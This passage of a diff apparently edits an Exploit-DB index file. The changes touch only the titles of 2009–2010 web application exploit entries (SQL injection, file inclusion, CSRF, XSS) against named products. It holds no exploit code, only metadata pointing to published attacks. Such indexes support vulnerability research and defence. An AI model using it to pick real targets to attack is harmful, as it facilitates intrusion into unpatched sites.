10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -22676,7 +22677,7 @@ id,file,description,date,author,platform,type,port 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin",2009-12-17,RENO,php,webapps,0 -10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 +10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Authentication Bypass",2009-12-17,bi0,php,webapps,0 @@ -22688,7 +22689,7 @@ id,file,description,date,author,platform,type,port 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 -10533,platforms/php/webapps/10533.txt,"VirtueMart - 'Product_ID' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 +10533,platforms/php/webapps/10533.txt,"VirtueMart - 'Product_ID' SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,cr4wl3r,php,webapps,0 @@ -22710,7 +22711,7 @@ id,file,description,date,author,platform,type,port 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0 -10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0 +10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusions",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller - Cross-Site Scripting",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 @@ -22838,7 +22839,7 @@ id,file,description,date,author,platform,type,port 10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 -10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0 +10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10754,platforms/multiple/webapps/10754.txt,"Joomla! Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 @@ -22910,16 +22911,16 @@ id,file,description,date,author,platform,type,port 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0 -10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 10880,platforms/php/webapps/10880.php,"bbScript 1.1.2.1 - 'id' Blind SQL Injection",2009-12-31,cOndemned,php,webapps,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog - Database Disclosure",2010-01-01,LionTurk,asp,webapps,0 -10884,platforms/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 (blogs.php?Id) - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 +10884,platforms/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 - 'blogs.php?Id' SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 10885,platforms/php/webapps/10885.txt,"Cype CMS - SQL Injection",2010-01-01,Sora,php,webapps,0 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - 'NewsId' SQL Injection",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 @@ -22996,10 +22997,10 @@ id,file,description,date,author,platform,type,port 11036,platforms/php/webapps/11036.txt,"Roundcube Webmail - Multiple Vulnerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,php,webapps,0 11047,platforms/php/webapps/11047.txt,"Zeeways Technology - 'product_desc.php' SQL Injection",2010-01-07,Gamoscu,php,webapps,0 -11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - ladder.php SQL Injection",2010-01-07,Sora,php,webapps,0 +11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,php,webapps,0 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script - 'index.php' Directory Traversal",2010-01-07,Red-D3v1L,php,webapps,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Arbitrary File Upload",2010-01-07,Yozgat.Us,php,webapps,0 -11060,platforms/php/webapps/11060.txt,"Drupal 6.15 - Multiple Permanent Cross-Site Scripting",2010-01-07,emgent,php,webapps,80 +11060,platforms/php/webapps/11060.txt,"Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla! Component Regional Booking - 'id' Blind SQL Injection",2010-01-07,"Hussin X",php,webapps,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 - (print_view) Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 11068,platforms/php/webapps/11068.txt,"Joomla! Component com_ksadvertiser - SQL Injection",2010-01-08,FL0RiX,php,webapps,0 @@ -23040,7 +23041,7 @@ id,file,description,date,author,platform,type,port 11147,platforms/php/webapps/11147.txt,"Max's File Uploader - Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11155,platforms/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,php,webapps,0 -11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0 +11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum - (layout) Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0 @@ -23053,7 +23054,7 @@ id,file,description,date,author,platform,type,port 11177,platforms/php/webapps/11177.txt,"Joomla! Component com_prime - Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla! Component com_libros - SQL Injection",2010-01-17,FL0RiX,php,webapps,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilities",2010-01-18,"Prashant Khandelwal",php,webapps,0 -11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps,0 +11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps,0 11185,platforms/php/webapps/11185.html,"al3jeb script - Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",multiple,webapps,0 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 @@ -23076,7 +23077,7 @@ id,file,description,date,author,platform,type,port 11237,platforms/php/webapps/11237.txt,"Joomla! Component com_casino - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps,0 11238,platforms/php/webapps/11238.txt,"Joomla! Component com_jbpublishdownfp - SQL Injection",2010-01-23,B-HUNT3|2,php,webapps,0 11239,platforms/php/webapps/11239.txt,"Joomla! Component JBDiary - Blind SQL Injection",2010-01-23,B-HUNT3|2,php,webapps,0 -11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple Local File Inclusion",2010-01-23,ViRuSMaN,php,webapps,0 +11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple Local File Inclusions",2010-01-23,ViRuSMaN,php,webapps,0 11243,platforms/windows/webapps/11243.txt,"Joomla! Component com_mochigames - SQL Injection",2010-01-24,B-HUNT3|2,windows,webapps,0 11244,platforms/php/webapps/11244.txt,"Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection",2010-01-24,cp77fk4r,php,webapps,0 11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0 @@ -23094,11 +23095,11 @@ id,file,description,date,author,platform,type,port 11282,platforms/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0 11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 -11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 +11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0 11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0 -11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 +11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps,0 @@ -23178,7 +23179,7 @@ id,file,description,date,author,platform,type,port 11411,platforms/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,php,webapps,0 11412,platforms/php/webapps/11412.txt,"Trade Manager Script - SQL Injection",2010-02-11,JaMbA,php,webapps,0 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 -11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (Local File Inclusion / Remote File Inclusion) Multiple Include",2010-02-12,cr4wl3r,php,webapps,0 +11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - Multiple Local File Inclusion / Remote File Inclusions",2010-02-12,cr4wl3r,php,webapps,0 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps,0 11424,platforms/php/webapps/11424.txt,"CMS Made Simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps,0 @@ -23186,11 +23187,11 @@ id,file,description,date,author,platform,type,port 11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 -11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection",2010-02-13,Gamoscu,php,webapps,0 +11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' SQL Injection",2010-02-13,Gamoscu,php,webapps,0 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 -11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 +11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusions",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0 @@ -23209,7 +23210,7 @@ id,file,description,date,author,platform,type,port 11464,platforms/php/webapps/11464.txt,"Joomla! Component com_hdvideoshare - SQL Injection",2010-02-15,snakespc,php,webapps,0 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 -11474,platforms/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' Parameter SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 +11474,platforms/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 11476,platforms/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps,0 11477,platforms/php/webapps/11477.txt,"Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)",2010-02-16,"Luis Santana",php,webapps,0 11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",php,webapps,0 @@ -23281,7 +23282,7 @@ id,file,description,date,author,platform,type,port 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0 -11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 +11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0 @@ -23335,7 +23336,7 @@ id,file,description,date,author,platform,type,port 11680,platforms/php/webapps/11680.txt,"Gazelle CMS - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps,0 11681,platforms/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,cr4wl3r,php,webapps,0 11684,platforms/php/webapps/11684.txt,"Joomla! Component com_about - SQL Injection",2010-03-11,snakespc,php,webapps,0 -11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 +11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-11,ITSecTeam,php,webapps,0 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 11687,platforms/php/webapps/11687.txt,"Ane CMS 1 - Persistent Cross-Site Scripting",2010-03-11,"pratul agrawal",php,webapps,0 11688,platforms/php/webapps/11688.txt,"Joomla! Component com_blog - SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 @@ -23419,7 +23420,7 @@ id,file,description,date,author,platform,type,port 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection",2010-03-18,ViRuS_HiMa,php,webapps,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 -11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,cr4wl3r,php,webapps,0 +11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusions",2010-03-18,cr4wl3r,php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 @@ -23431,8 +23432,8 @@ id,file,description,date,author,platform,type,port 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,php,webapps,0 -11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 -11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 +11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,php,webapps,0 +11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,php,webapps,0 11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0 11833,platforms/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps,0 11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0 @@ -23445,7 +23446,7 @@ id,file,description,date,author,platform,type,port 11845,platforms/php/webapps/11845.txt,"Joomla! Component com_jwmmxtd - Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 11846,platforms/php/webapps/11846.txt,"Uiga Business Portal - 'index.php' SQL Injection",2010-03-23,"Easy Laster",php,webapps,0 11847,platforms/windows/webapps/11847.txt,"Joomla! Component com_gds - SQL Injection",2010-03-23,"DevilZ TM",windows,webapps,0 -11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusion",2010-03-23,mat,php,webapps,0 +11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusions",2010-03-23,mat,php,webapps,0 11850,platforms/php/webapps/11850.txt,"Zephyrus CMS - 'index.php' SQL Injection",2010-03-23,Phenom,php,webapps,0 11851,platforms/php/webapps/11851.txt,"Joomla! Component Property - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps,0 @@ -23462,12 +23463,12 @@ id,file,description,date,author,platform,type,port 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0 -11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - '/photo.php' SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 -11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusion",2010-03-25,mat,php,webapps,0 +11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - 'photo.php' SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 +11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusions",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System - SQL Injection",2010-03-26,"Easy Laster",php,webapps,0 -11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusion",2010-03-26,2010-03-26,php,webapps,0 +11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusions",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,php,webapps,0 11892,platforms/php/webapps/11892.txt,"post Card - 'catid' SQL Injection",2010-03-26,"Hussin X",php,webapps,0 11894,platforms/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0 @@ -23512,7 +23513,7 @@ id,file,description,date,author,platform,type,port 11949,platforms/php/webapps/11949.txt,"Fa-Ads - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11950,platforms/php/webapps/11950.txt,"Fa Home - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0 -11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0 +11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusions",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0 @@ -23549,7 +23550,7 @@ id,file,description,date,author,platform,type,port 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf Mod Downloads - SQL Injection",2010-04-03,Inj3ct0r,php,webapps,0 -12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery",2010-04-03,cp77fk4r,asp,webapps,0 +12029,platforms/asp/webapps/12029.txt,"SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities",2010-04-03,cp77fk4r,asp,webapps,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,php,webapps,0 12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0 @@ -23563,8 +23564,8 @@ id,file,description,date,author,platform,type,port 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File 